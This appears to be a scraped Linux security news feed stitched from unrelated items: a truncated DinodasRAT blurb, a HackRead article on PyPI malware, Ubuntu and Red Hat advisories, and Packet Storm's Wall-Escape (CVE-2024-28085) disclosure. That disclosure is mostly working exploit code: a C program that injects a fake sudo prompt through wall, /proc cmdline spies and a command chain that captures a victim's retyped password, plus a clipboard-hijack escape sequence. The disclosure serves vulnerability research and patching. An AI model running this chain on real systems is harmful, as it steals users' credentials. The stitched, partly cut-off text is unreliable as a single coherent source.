A Linux version of a multi-platform backdoor called DinodasRAT has been detected in the wild targeting China, Taiwan, Turkey, and Uzbekistan, new findings from Kaspersky reveal.
DinodasRAT, also known as XDealer, is a C++-based malware that offers the ability to harvest a wide range of sensitive data from compromised hosts.
In October 2023, Slovak cybersecurity firm ESET

Linux Version of DinodasRAT Spotted in Cyber Attacks Across Several Countries

By Waqas
Are you a Python developer? Here's what you need to know!
This is a post from HackRead.com Read the original post: PyPI Suspends New Projects and Users Due to Malicious Packages

PyPI hit by malware attack! Malicious packages targeting crypto wallets & browser data. Platform suspends new users & projects. Learn how to stay safe and what you should do.

_This article has been updated with new information._

In a move to combat a large-scale malware campaign, the Python Package Index (PyPI), the official repository for third-party Python software, has suspended new user registration and project creation. This critical action comes after security researchers at Checkmarx identified a series of malicious packages targeting unsuspecting developers.

According to PyPI’s official update released on March 28th, 2024, at 2:16 UTC, the platform is taking proactive measures to “mitigate an ongoing malware upload campaign.” This suspension aims to disrupt the attackers’ efforts and protect the vast Python developer community.

****Checkmarx Discovers Deceptive Software****

The security team at Checkmarx identified a coordinated effort by threat actors to upload malicious packages onto PyPI. These packages are designed to exploit a common vulnerability known as typosquatting. Typosquatting tricks users into installing malware by using names and website addresses that closely resemble those of legitimate software.

Once installed, these malicious packages unleash a multi-stage attack. The initial payload targets a user’s cryptocurrency wallets, aiming to steal valuable digital assets. The attackers further expand their reach by scraping sensitive data from browsers, including cookies and extension information. Additionally, the malware attempts to steal various login credentials, potentially compromising a user’s entire digital ecosystem.

According to Checkmarx’s research shared with Hackread.com ahead of publication on Thursday, the most concerning aspect of this attack is the malware’s persistence mechanism. This mechanism allows the malware to survive system reboots, ensuring its continued operation even after a restart. This persistence significantly increases the difficulty of detection and eradication.

****PyPI Fights Back****

PyPI’s quick suspension of new user registration and project creation shows the platform’s commitment to user safety. This action also potentially disrupts the attackers’ ability to upload new malicious packages and provides PyPI with time to implement more robust security measures.

****What Developers Should Do****

While PyPI works to address the situation, developers are advised to exercise extreme caution when installing Python packages. Here are some essential security practices:

*   **Double-check package names and sources:** Meticulously verify the spelling and origin of any package before installation. Typosquatting relies on tricking users into installing the wrong software.
*   **Verify publisher reputation:** Research the publisher behind a package before trusting it. Look for established developers with a history of creating reliable software.
*   **Read reviews and ratings:** User reviews and ratings can offer valuable insights into a package’s legitimacy and functionality.
*   **Stay informed:** Keep yourself updated on the latest security threats targeting PyPI and the Python community.

****The Future of PyPI Security****

The PyPI security team is working to identify and remove all malicious packages from the platform. Additionally, they will be implementing tougher measures to prevent similar attacks in the future. Developers can expect further announcements from PyPI regarding the timeline for resuming new user registration and project creation.

This incident goes on to show how sophisticated cyberattacks have become especially when targeting the software development community. By working together, developers, security researchers, and platform operators like PyPI can create a safer and more secure environment for everyone.

****UPDATE Mar 28, 2024 – 12:56 UTC****

As of March 28, 2024, 12:56 UTC, PyPI’s official website states, “This incident has been resolved,” indicating that the registration of new projects and users is now enabled again.

1.  Why is learning Python important in Data Science?
2.  OpenSSF Launches Malicious Packages Repository
3.  6 official Python repositories plagued with cryptomining malware
4.  Crypto Stealing PyPI Malware Hits Both Windows and Linux Users
5.  GitHub Abused to Spread Malicious Packages on PyPI in Image Files

PyPI Suspends New Projects and Users Due to Malicious Packages

Ubuntu Security Notice 6719-1 - Skyler Ferrante discovered that the util-linux wall command did not filter escape sequences from command line arguments. A local attacker could possibly use this issue to obtain sensitive information.

==========================================================================  
Ubuntu Security Notice USN-6719-1  
March 27, 2024

util-linux vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

util-linux could be made to expose sensitive information.

Software Description:  
- util-linux: miscellaneous system utilities

Details:

Skyler Ferrante discovered that the util-linux wall command did not filter  
escape sequences from command line arguments. A local attacker could  
possibly use this issue to obtain sensitive information.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.10:  
   util-linux                      2.39.1-4ubuntu2.1

Ubuntu 22.04 LTS:  
   util-linux                      2.37.2-4ubuntu3.3

Ubuntu 20.04 LTS:  
   util-linux                      2.34-0.1ubuntu9.5

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6719-1  
   CVE-2024-28085

Package Information:  
   https://launchpad.net/ubuntu/+source/util-linux/2.39.1-4ubuntu2.1  
   https://launchpad.net/ubuntu/+source/util-linux/2.37.2-4ubuntu3.3  
   https://launchpad.net/ubuntu/+source/util-linux/2.34-0.1ubuntu9.5

Ubuntu Security Notice USN-6719-1

The util-linux wall command does not filter escape sequences from command line arguments. The vulnerable code was introduced in commit cdd3cc7fa4 (2013). Every version since has been vulnerable. This allows unprivileged users to put arbitrary text on other users terminals, if mesg is set to y and wall is setgid. CentOS is not vulnerable since wall is not setgid. On Ubuntu 22.04 and Debian Bookworm, wall is both setgid and mesg is set to y by default.

Wall-Escape (CVE-2024-28085)

Skyler Ferrante: Escape sequence injection in util-linux wall

=================================================================  
Summary  
=================================================================

The util-linux wall command does not filter escape sequences from  
command line arguments. The vulnerable code was introduced in  
commit cdd3cc7fa4 (2013). Every version since has been  
vulnerable.

This allows unprivileged users to put arbitrary text on other  
users terminals, if mesg is set to y and wall is setgid. CentOS  
is not vulnerable since wall is not setgid. On Ubuntu 22.04 and  
Debian Bookworm, wall is both setgid and mesg is set to y by  
default.

If a system runs a command when commands are not found, with the  
unknown command as an argument, the unknown command will be  
leaked. This is true of Ubuntu 22.04. Debian Bookworm does not  
leak unknown commands in its starting configuration.

On Ubuntu 22.04, we have enough control to leak a users password  
by default. The only indication of attack to the user will be an  
incorrect password prompt when they correctly type their  
password, along with their password being in their command  
history.

On other systems that allow wall messages to be sent, an attacker  
may be able to alter the clipboard of a victim. This works on  
windows-terminal, but not on gnome-terminal.

=================================================================  
Analysis  
=================================================================

When displaying inputs from stdin, wall uses the function  
fputs_careful in order to neutralize escape characters.

Unfortunately, wall does not do the same for input coming from  
argv.

term-utils/wall.c (note that mvec is argv)  
```  
/*  
* Read message from argv[]  
*/  
int i;

for (i = 0; i < mvecsz; i++) {  
  fputs(mvec[i], fs);  
  if (i < mvecsz - 1)  
          fputc(' ', fs);  
}  
fputs("\r\n", fs);  
...

/*  
 * Read message from stdin.  
 */  
while (getline(&lbuf, &lbuflen, stdin) >= 0)  
        fputs_careful(lbuf, fs, '^', true, TERM_WIDTH);  
```

Since argv is attacker controlled, and can contain binary data,  
this is exploitable. A simple PoC command:

        wall $(printf "\033[33mHI")

If you are vulnerable, this should show a broadcast with "HI"  
being yellow. If we instead run:

        echo $(printf "\033[33mHI") | wall

This should fail with "^[[33m" showing up before our message.

To make sure the PoC will work, make sure your victim user can  
actually receive messages. First check that mesg is set to y  
(`mesg y`). If a user does not have mesg turned on, they are not  
exploitable.

If you still can't receive messages, try running `su user` or  
accessing the machine through SSH. Note that just because you  
can't receive messages without first going through su/SSH, does  
not mean a user is not vulnerable.  
=================================================================  
Exploitation  
=================================================================

Most distros allow argument data to be seen by unprivileged  
users, and some distros run commands when commands are not found.  
We can use this to leak a users password by tricking them into  
giving their password as a command to run.

When I run the command xsnow in my terminal, I get the following  
output:  
```  
Command 'xsnow' not found, but can be installed with:  
sudo apt install xsnow  
```

Lets look at what new processes are created when I do this:  
```  
-bash  
/usr/bin/python3 /usr/lib/command-not-found -- xsnow  
/usr/bin/snap advise-snap --format=json --command xsnow  
```

This is on Ubuntu, but similar commands exist on other systems.

As a simple demonstration let's create a fake sudo prompt for  
gnome-terminal, and then spy on /proc/$pid/cmdline.

fake sudo prompt:  
```  
#include<stdio.h>  
#include<unistd.h>

int main(){  
        char* argv[] = {"prog",  
                "\033[3A" // Move up 3  
                "\033[K"  // Delete prompt  
                "[sudo] password for a_user:"  
                "\033[?25l"  
                // Set forground RGB (48,10,36)  
                //      hide typing  
                "\033[38;2;48;10;36m",  
        NULL};

        char* envp[] = {NULL};

        execve("/usr/bin/wall", argv, envp);  
}  
```

cmdline spy:  
```  
#include<stdio.h>  
#include<sys/types.h>  
#include<sys/stat.h>  
#include<fcntl.h>  
#include<unistd.h>  
#include<ctype.h>  
#include<stdlib.h>  
#include<dirent.h>  
#include<time.h>

#define USLEEP_TIME 2000

int main(){  
        pid_t current_max_pid = 0, next_max_pid;  
        char current_file_name[BUFSIZ];  
        char buf[BUFSIZ];

        DIR* proc_dir;  
        struct dirent *dir_e;  
        int curr_e_fp;

        while(1){  
                proc_dir = opendir("/proc");  
                if(!proc_dir)  
                        abort();

                usleep(USLEEP_TIME);  
                while((dir_e = readdir(proc_dir)) != NULL){  
                        char* d_name = dir_e->d_name;

                        // If not a digit (not a process folder)  
                        if(!isdigit(*d_name))  
                                continue;

                        int num = atoi(d_name);

                        if(num > current_max_pid){  
                                next_max_pid = num;  
                        }else{  
                                continue;  
                        }

                        snprintf(current_file_name,  
sizeof(current_file_name), "%s%s%s", "/proc/", d_name, "/cmdline");  
                        curr_e_fp = open(current_file_name, O_RDONLY);  
                        int ra = read(curr_e_fp, buf, BUFSIZ-1);  
                        close(curr_e_fp);

                        for(int i = 0; i<ra-1; i++)  
                                if(buf[i] == '\0') buf[i] = ' ';

                        // guaranteed to be in-bounds  
                        buf[ra-1] = '\n';

                        write(1, buf, ra);  
                }  
                current_max_pid = next_max_pid;  
                closedir(proc_dir);  
        }  
}  
```

If we run the cmdline spy and the sudo password prompt, the user  
may input their password as a command. It will look like the  
following on Ubuntu:

```  
-bash  
/usr/bin/python3 /usr/lib/command-not-found -- SuperSecretPassword!  
/usr/bin/snap advise-snap --format=json --command SuperSecretPassword!  
```

Some distros, like Debian, do not seem to have a command like  
command-not-found by default. There does not seem to be a way to  
leak a users password in this case then, even though we can send  
escape sequences to them.

This works, but the user has no reason to expect a password page  
at this point. Now that we have shown some exploitability, lets  
try and make it better.

Imagine we run the cmdline spy in one terminal, and then in  
another terminal we run `sudo systemctl status cron.service`.  
The spy will see the sudo process first, and then after the user  
types their password correctly they will see `systemctl status  
cron.service`.

```  
sudo systemctl status cron.service  
systemctl status cron.service  
```

An attacker could inject a password incorrect message as soon as  
the second process starts (password correct). The user will  
assume they typed their password incorrectly and enter it again.

watch for certain command  
```  
#include<stdio.h>  
#include<sys/types.h>  
#include<sys/stat.h>  
#include<fcntl.h>  
#include<unistd.h>  
#include<ctype.h>  
#include<stdlib.h>  
#include<dirent.h>  
#include<time.h>  
#include<string.h>

#define USLEEP_TIME 3000

int main(int argc, char** argv){  
        pid_t current_max_pid = 0, next_max_pid;  
        char current_file_name[BUFSIZ];  
        char buf[BUFSIZ];

        DIR* proc_dir;  
        struct dirent *dir_e;  
        int curr_e_fp;

        if(argc != 2){  
                printf("Usage: prog search_string\n");  
                return 1;  
        }

        while(1){  
                proc_dir = opendir("/proc");  
                if(!proc_dir)  
                        abort();  
                usleep(USLEEP_TIME);  
                while((dir_e = readdir(proc_dir)) != NULL){  
                        char* d_name = dir_e->d_name;

                        // If not a digit (not a process folder)  
                        if(!isdigit(*d_name))  
                                continue;

                        snprintf(current_file_name,  
sizeof(current_file_name), "%s%s%s", "/proc/", d_name, "/cmdline");  
                        curr_e_fp = open(current_file_name, O_RDONLY);  
                        int ra = read(curr_e_fp, buf, BUFSIZ-1);  
                        close(curr_e_fp);

                        for(int i = 0; i<ra-1; i++)  
                                if(buf[i] == '\0') buf[i] = ' ';

                        // guaranteed to be in-bounds  
                        buf[ra-1] = '\0';

                        // Check if proces is us  
                        if(strstr(buf, argv[0])){  
                                continue;  
                        }  
                        // Check against search string  
                        if(!strcmp(buf, argv[1])){  
                                write(1, buf, ra);  
                                write(1, "\n", 1);  
                                return 0;  
                        }  
                }  
                closedir(proc_dir);  
        }  
}  
```

Imagine our new spy code was compiled as watch, and our wall  
exploit was called throw.

We can now run:  
```  
./watch "sudo systemctl start sshd"; ./watch "systemctl start sshd";  
sleep .1; ./throw  
```

The first two commands will wait until the user runs

        sudo systemctl start sshd

and correctly types their password for sudo. Then our wall  
exploit sends our fake sudo prompt. We need to sleep for a short  
duration to make sure we cover up the command prompt.

During this process, we need to make sure our original spy code  
is logging all cmdline arguments, to recover the victims password

Example log from original spy:  
```  
./watch sudo systemctl start sshd  
sudo systemctl start sshd  
./watch systemctl start sshd  
systemctl start sshd  
bash  
./throw  
bash  
/usr/bin/python3 /usr/lib/command-not-found -- SuperStrongPassword  
/usr/bin/snap advise-snap --format=json --command SuperStrongPassword  
```

Now lets imagine a different style of attack. An attacker can  
change a users clipboard through escape sequences on some  
terminals. For example, windows-terminal supports this. Gnome  
terminal does not.

```  
#include<stdio.h>

int main(){  
        printf("\033]52;c;QXR0YWNrZXIgbWVzc2FnZQo=\a");  
}  
```

Since we can send escape sequences through wall, if a user is  
using a terminal that supports this escape sequence, an attacker  
can change the victims clipboard to arbitrary text.

Further references:  
  https://people.rit.edu/sjf5462/6831711781/wall_2_27_2024.txt  
  https://github.com/skyler-ferrante/CVE-2024-28085

util-linux wall Escape Sequence Injection

Red Hat Security Advisory 2024-1555-03 - An update for.NET 6.0 is now available for Red Hat Enterprise Linux 9. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1555.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: .NET 6.0 security updateAdvisory ID:        RHSA-2024:1555-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1555Issue date:         2024-03-28Revision:           03CVE Names:          CVE-2024-21404====================================================================Summary: An update for .NET 6.0 is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:.NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation.New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 6.0.127 and .NET Runtime 6.0.27.Security Fix(es):* dotnet: Denial of Service in X509Certificate2 (CVE-2024-21404)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-21404References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2263086

Red Hat Security Advisory 2024-1555-03

Red Hat Security Advisory 2024-1554-03 - An update for.NET 6.0 is now available for Red Hat Enterprise Linux 8. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1554.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: .NET 6.0 security updateAdvisory ID:        RHSA-2024:1554-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1554Issue date:         2024-03-28Revision:           03CVE Names:          CVE-2024-21404====================================================================Summary: An update for .NET 6.0 is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:.NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation.New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 6.0.127 and .NET Runtime 6.0.27.Security Fix(es):* dotnet: Denial of Service in X509Certificate2 (CVE-2024-21404)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-21404References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2263086

Red Hat Security Advisory 2024-1554-03

Red Hat Security Advisory 2024-1553-03 - An update for.NET 6.0 is now available for Red Hat Enterprise Linux 8. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1553.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: .NET 6.0 security updateAdvisory ID:        RHSA-2024:1553-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1553Issue date:         2024-03-28Revision:           03CVE Names:          CVE-2024-21404====================================================================Summary: An update for .NET 6.0 is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:.NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation.New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 6.0.127 and .NET Runtime 6.0.27.Security Fix(es):* dotnet: Denial of Service in X509Certificate2 (CVE-2024-21404)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-21404References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2263086

Red Hat Security Advisory 2024-1553-03

Red Hat Security Advisory 2024-1552-03 - An update for.NET 6.0 is now available for Red Hat Enterprise Linux 9. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1552.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: .NET 6.0 security updateAdvisory ID:        RHSA-2024:1552-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1552Issue date:         2024-03-28Revision:           03CVE Names:          CVE-2024-21404====================================================================Summary: An update for .NET 6.0 is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:.NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation.New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 6.0.127 and .NET Runtime 6.0.27.Security Fix(es):* dotnet: Denial of Service in X509Certificate2 (CVE-2024-21404)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-21404References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2263086

Red Hat Security Advisory 2024-1552-03

Red Hat Security Advisory 2024-1545-03 - An update for dnsmasq is now available for Red Hat Enterprise Linux 8.6 Extended Update Support. Issues addressed include a use-after-free vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1545.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: dnsmasq security update  
Advisory ID:        RHSA-2024:1545-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:1545  
Issue date:         2024-03-27  
Revision:           03  
CVE Names:          CVE-2022-0934  
====================================================================

Summary: 

An update for dnsmasq is now available for Red Hat Enterprise Linux 8.6 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The dnsmasq packages contain dnsmasq, a lightweight DNS (Domain Name Server) forwarder and DHCP (Dynamic Host Configuration Protocol) server.

Security Fixes:

* dnsmasq: Heap use after free in dhcp6_no_relay (CVE-2022-0934)

* dnsmasq: default maximum EDNS.0 UDP packet size was set to 4096 but should be 1232 (CVE-2023-28450)

* dnsmasq: bind9: KeyTrap - Extreme CPU consumption in DNSSEC validator (CVE-2023-50387)

* dnsmasq: bind9: Preparing an NSEC3 closest encloser proof can exhaust CPU resources (CVE-2023-50868)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2022-0934

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2057075  
https://bugzilla.redhat.com/show_bug.cgi?id=2178948  
https://bugzilla.redhat.com/show_bug.cgi?id=2263914  
https://bugzilla.redhat.com/show_bug.cgi?id=2263917

Red Hat Security Advisory 2024-1545-03

Red Hat Security Advisory 2024-1544-03 - An update for dnsmasq is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1544.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: dnsmasq security and bug fix update  
Advisory ID:        RHSA-2024:1544-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:1544  
Issue date:         2024-03-27  
Revision:           03  
CVE Names:          CVE-2023-28450  
====================================================================

Summary: 

An update for dnsmasq is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The dnsmasq packages contain dnsmasq, a lightweight DNS (Domain Name Server) forwarder and DHCP (Dynamic Host Configuration Protocol) server.

Security Fixes:

* dnsmasq: default maximum EDNS.0 UDP packet size was set to 4096 but should be 1232 (CVE-2023-28450)

* dnsmasq: bind9: KeyTrap - Extreme CPU consumption in DNSSEC validator (CVE-2023-50387)

* dnsmasq: bind9: Preparing an NSEC3 closest encloser proof can exhaust CPU resources (CVE-2023-50868)

Bug Fix:

* Segmentation fault occurs in dnsmasq-2.79-26 in RHEL8

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-28450

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2178948  
https://bugzilla.redhat.com/show_bug.cgi?id=2263914  
https://bugzilla.redhat.com/show_bug.cgi?id=2263917

Tag

#linux